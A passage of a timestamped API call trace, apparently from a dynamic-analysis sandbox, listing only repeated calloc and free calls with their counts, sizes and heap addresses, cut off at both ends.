returned 0x1fa0af0 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1480 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1510 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa15a0 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1630 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa16c0 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1750 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa17e0 [0064.353] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1870 [0064.354] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1900 [0064.354] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1990 [0064.354] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1a20 [0064.355] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1ab0 [0064.355] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1b40 [0064.355] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1bd0 [0064.355] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1c60 [0064.355] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1cf0 [0064.355] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1d80 [0064.359] free (_Block=0x1fa12d0) [0064.359] free (_Block=0x1fa1240) [0064.359] free (_Block=0x1fa11b0) [0064.359] free (_Block=0x1fa1120) [0064.359] free (_Block=0x1fa1090) [0064.359] free (_Block=0x1fa1000) [0064.359] free (_Block=0x1fa0f70) [0064.359] free (_Block=0x1fa0ee0) [0064.359] free (_Block=0x1fa0e50) [0064.359] free (_Block=0x1fa0dc0) [0064.360] free (_Block=0x1fa0d30) [0064.360] free (_Block=0x1fa0ca0) [0064.360] free (_Block=0x1fa0c10) [0064.360] free (_Block=0x1fa0b80) [0064.360] free (_Block=0x1fa0af0) [0064.360] free (_Block=0x1fa1480) [0064.360] free (_Block=0x1fa1510) [0064.360] free (_Block=0x1fa15a0) [0064.360] free (_Block=0x1fa1630) [0064.360] free (_Block=0x1fa16c0) [0064.360] free (_Block=0x1fa1750) [0064.360] free (_Block=0x1fa17e0) [0064.360] free (_Block=0x1fa1870) [0064.360] free (_Block=0x1fa1900) [0064.360] free (_Block=0x1fa1990) [0064.360] free (_Block=0x1fa1a20) [0064.360] free (_Block=0x1fa1ab0) [0064.360] free (_Block=0x1fa1b40) [0064.360] free (_Block=0x1fa1bd0) [0064.360] free (_Block=0x1fa1c60) [0064.360] free (_Block=0x1fa1cf0) [0064.360] free (_Block=0x1fa1d80) [0064.360] free (_Block=0x1fa1360) [0064.360] free (_Block=0x77fea0) [0064.360] calloc (_Count=0x40, _Size=0x4) returned 0x77fea0 [0064.360] calloc (_Count=0x40, _Size=0x4) returned 0x1fa0158 [0064.360] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0064.360] calloc (_Count=0x42, _Size=0x4) returned 0x1fa0260 [0064.361] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.361] calloc (_Count=0x3, _Size=0x4) returned 0x77ffa8 [0064.361] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0370 [0064.361] free (_Block=0x1fa0158) [0064.361] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1360 [0064.361] free (_Block=0x77dc50) [0064.361] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0480 [0064.361] free (_Block=0x1fa1360) [0064.361] calloc (_Count=0x2, _Size=0x4) returned 0x77ffc0 [0064.361] calloc (_Count=0x3, _Size=0x4) returned 0x77ffd0 [0064.361] free (_Block=0x7713d8) [0064.361] free (_Block=0x77ffc0) [0064.361] calloc (_Count=0x22, _Size=0x4) returned 0x1fa1360 [0064.361] free (_Block=0x77ffd0) [0064.361] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0590 [0064.361] free (_Block=0x1fa1360) [0064.361] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.361] free (_Block=0x7713d8) [0064.361] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.361] free (_Block=0x7713d8) [0064.361] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.361] free (_Block=0x7713d8) [0064.361] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.361] free (_Block=0x7713d8) [0064.361] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.361] free (_Block=0x7713d8) [0064.361] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.361] free (_Block=0x7713d8) [0064.361] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.362] free (_Block=0x7713d8) [0064.362] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.362] free (_Block=0x7713d8) [0064.362] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.362] free (_Block=0x7713d8) [0064.362] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.362] free (_Block=0x7713d8) [0064.362] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.362] free (_Block=0x7713d8) [0064.362] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.362] free (_Block=0x7713d8) [0064.362] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.362] free (_Block=0x7713d8) [0064.362] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.362] free (_Block=0x7713d8) [0064.362] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.362] free (_Block=0x7713d8) [0064.362] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.362] free (_Block=0x7713d8) [0064.362] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.362] free (_Block=0x7713d8) [0064.362] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.362] free (_Block=0x7713d8) [0064.362] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.362] free (_Block=0x7713d8) [0064.362] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.362] free (_Block=0x7713d8) [0064.363] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.363] free (_Block=0x7713d8) [0064.363] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.363] free (_Block=0x7713d8) [0064.363] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.363] free (_Block=0x7713d8) [0064.363] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.363] free (_Block=0x7713d8) [0064.363] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.363] free (_Block=0x7713d8) [0064.363] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.363] free (_Block=0x7713d8) [0064.363] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.363] free (_Block=0x7713d8) [0064.363] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.363] free (_Block=0x7713d8) [0064.363] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.363] free (_Block=0x7713d8) [0064.363] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.363] free (_Block=0x7713d8) [0064.363] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.363] free (_Block=0x7713d8) [0064.363] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.363] free (_Block=0x7713d8) [0064.363] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.363] free (_Block=0x7713d8) [0064.363] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.364] free (_Block=0x7713d8) [0064.364] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.364] free (_Block=0x7713d8) [0064.364] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.364] free (_Block=0x7713d8) [0064.364] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.364] free (_Block=0x7713d8) [0064.364] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.364] free (_Block=0x7713d8) [0064.364] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.364] free (_Block=0x7713d8) [0064.364] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.364] free (_Block=0x7713d8) [0064.364] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.364] free (_Block=0x7713d8) [0064.364] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.364] free (_Block=0x7713d8) [0064.364] free (_Block=0x1fa0370) [0064.364] free (_Block=0x1fa0480) [0064.364] free (_Block=0x1fa0260) [0064.364] free (_Block=0x1fa0590) [0064.364] free (_Block=0x77ffa8) [0064.364] calloc (_Count=0x40, _Size=0x4) returned 0x1fa0158 [0064.364] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0064.376] free (_Block=0x1fa12d0) [0064.376] free (_Block=0x1fa1240) [0064.376] free (_Block=0x1fa11b0) [0064.376] free (_Block=0x1fa1120) [0064.376] free (_Block=0x1fa1090) [0064.376] free (_Block=0x1fa1000) [0064.376] free (_Block=0x1fa0f70) [0064.376] free (_Block=0x1fa0ee0) [0064.377] free (_Block=0x1fa0e50) [0064.442] calloc (_Count=0x40, _Size=0x4) returned 0x77fea0 [0064.442] calloc (_Count=0x40, _Size=0x4) returned 0x1fa0158 [0064.442] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0064.442] calloc (_Count=0x42, _Size=0x4) returned 0x1fa0260 [0064.442] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.442] calloc (_Count=0x3, _Size=0x4) returned 0x77ffa8 [0064.442] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0370 [0064.442] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1360 [0064.442] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0480 [0064.442] calloc (_Count=0x2, _Size=0x4) returned 0x77ffc0 [0064.442] calloc (_Count=0x3, _Size=0x4) returned 0x77ffd0 [0064.442] calloc (_Count=0x2, _Size=0x4) returned 0x77ffc0 [0064.442] calloc (_Count=0x22, _Size=0x4) returned 0x1fa1360 [0064.442] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0590 [0064.442] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.442] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.442] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.442] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.442] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.442] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.442] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.442] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.443] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.444] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.445] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.445] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.445] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.445] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.445] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.445] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.445] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.445] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.445] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.445] calloc (_Count=0x40, _Size=0x4) returned 0x1fa0158 [0064.445] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0064.445] calloc (_Count=0x42, _Size=0x4) returned 0x1fa0260 [0064.445] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.445] calloc (_Count=0x3, _Size=0x4) returned 0x77ffa8 [0064.445] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0370 [0064.445] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1360 [0064.445] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0480 [0064.445] calloc (_Count=0x2, _Size=0x4) returned 0x77ffc0 [0064.445] calloc (_Count=0x3, _Size=0x4) returned 0x77ffd0 [0064.445] calloc (_Count=0x2, _Size=0x4) returned 0x77ffc0 [0064.445] calloc (_Count=0x22, _Size=0x4) returned 0x1fa1360 [0064.445] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0590 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.446] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.447] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.448] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.448] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.448] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.448] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.448] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.448] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.448] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.448] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.448] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.448] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.448] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.448] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.448] calloc (_Count=0x40, _Size=0x4) returned 0x1fa0158 [0064.448] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0064.448] calloc (_Count=0x42, _Size=0x4) returned 0x1fa0260 [0064.448] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.448] calloc (_Count=0x3, _Size=0x4) returned 0x77ffa8 [0064.448] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0370 [0064.448] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1360 [0064.448] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0480 [0064.448] calloc (_Count=0x2, _Size=0x4) returned 0x77ffc0 [0064.448] calloc (_Count=0x3, _Size=0x4) returned 0x77ffd0 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x77ffc0 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x77ffc0 [0064.449] calloc (_Count=0x22, _Size=0x4) returned 0x1fa1360 [0064.449] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0590 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.449] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.450] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.450] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.450] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.450] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.450] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.450] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.450] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.450] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.450] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.450] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.450] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.450] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.450] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.450] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.450] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.450] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.450] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.450] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.451] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.452] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.452] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.452] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.452] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.452] calloc (_Count=0x20, _Size=0x4) returned 0x77db40 [0064.452] calloc (_Count=0x20, _Size=0x4) returned 0x77dbc8 [0064.452] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0064.452] calloc (_Count=0x21, _Size=0x4) returned 0x1fa13f0 [0064.452] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1360 [0064.452] calloc (_Count=0x42, _Size=0x4) returned 0x77fea0 [0064.452] calloc (_Count=0x1, _Size=0x4) returned 0x7713d8 [0064.452] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0048 [0064.452] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0158 [0064.452] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0064.452] calloc (_Count=0x43, _Size=0x4) returned 0x1fa0268 [0064.452] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.452] calloc (_Count=0x3, _Size=0x4) returned 0x77ffb0 [0064.452] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1d80 [0064.453] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0380 [0064.453] calloc (_Count=0x2, _Size=0x4) returned 0x77ffc8 [0064.453] calloc (_Count=0x3, _Size=0x4) returned 0x1fa0490 [0064.453] calloc (_Count=0x22, _Size=0x4) returned 0x1fa1d80 [0064.453] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0490 [0064.453] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.453] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.453] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.453] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.453] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.453] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.453] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.453] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.453] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.453] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.453] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.453] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.453] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.453] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.453] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.453] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.454] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.454] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.454] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.454] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.454] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.454] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.454] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.466] free (_Block=0x1fa12d0) [0064.466] free (_Block=0x1fa1240) [0064.466] free (_Block=0x1fa11b0) [0064.466] free (_Block=0x1fa1120) [0064.466] free (_Block=0x1fa1090) [0064.466] free (_Block=0x1fa1000) [0064.466] free (_Block=0x1fa0f70) [0064.466] free (_Block=0x1fa0ee0) [0064.466] free (_Block=0x1fa0e50) [0064.466] free (_Block=0x1fa0dc0) [0064.466] free (_Block=0x1fa0d30) [0064.466] free (_Block=0x1fa0ca0) [0064.466] free (_Block=0x1fa0c10) [0064.466] free (_Block=0x1fa0b80) [0064.466] free (_Block=0x1fa0af0) [0064.466] free (_Block=0x1fa1480) [0064.466] free (_Block=0x1fa1510) [0064.466] free (_Block=0x1fa15a0) [0064.466] free (_Block=0x1fa1630) [0064.466] free (_Block=0x1fa16c0) [0064.466] free (_Block=0x1fa1750) [0064.466] free (_Block=0x1fa17e0) [0064.466] free (_Block=0x1fa1870) [0064.466] free (_Block=0x1fa1900) [0064.467] free (_Block=0x1fa1990) [0064.467] free (_Block=0x1fa1a20) [0064.467] free (_Block=0x1fa1ab0) [0064.467] free (_Block=0x1fa1b40) [0064.467] free (_Block=0x1fa1bd0) [0064.467] free (_Block=0x1fa1c60) [0064.467] free (_Block=0x1fa1cf0) [0064.467] free (_Block=0x1fa1d80) [0064.467] free (_Block=0x1fa1360) [0064.467] free (_Block=0x77fea0) [0064.467] free (_Block=0x77dbc8) [0064.467] free (_Block=0x77db40) [0064.467] free (_Block=0x1fa13f0) [0064.467] free (_Block=0x1fa0048) [0064.473] free (_Block=0x1fa1d80) [0064.473] free (_Block=0x1fa1cf0) [0064.473] free (_Block=0x1fa1c60) [0064.473] free (_Block=0x1fa1bd0) [0064.473] free (_Block=0x1fa1b40) [0064.473] free (_Block=0x1fa1ab0) [0064.473] free (_Block=0x1fa1a20) [0064.473] free (_Block=0x1fa1990) [0064.473] free (_Block=0x1fa1900) [0064.473] free (_Block=0x1fa1870) [0064.473] free (_Block=0x1fa17e0) [0064.473] free (_Block=0x1fa1750) [0064.473] free (_Block=0x1fa16c0) [0064.473] free (_Block=0x1fa1630) [0064.473] free (_Block=0x1fa15a0) [0064.473] free (_Block=0x1fa1510) [0064.473] free (_Block=0x1fa1480) [0064.473] free (_Block=0x1fa0af0) [0064.474] free (_Block=0x1fa0b80) [0064.474] free (_Block=0x1fa0c10) [0064.474] free (_Block=0x1fa0ca0) [0064.474] free (_Block=0x1fa0d30) [0064.474] free (_Block=0x1fa0dc0) [0064.474] free (_Block=0x1fa0e50) [0064.474] free (_Block=0x1fa0ee0) [0064.474] free (_Block=0x1fa0f70) [0064.474] free 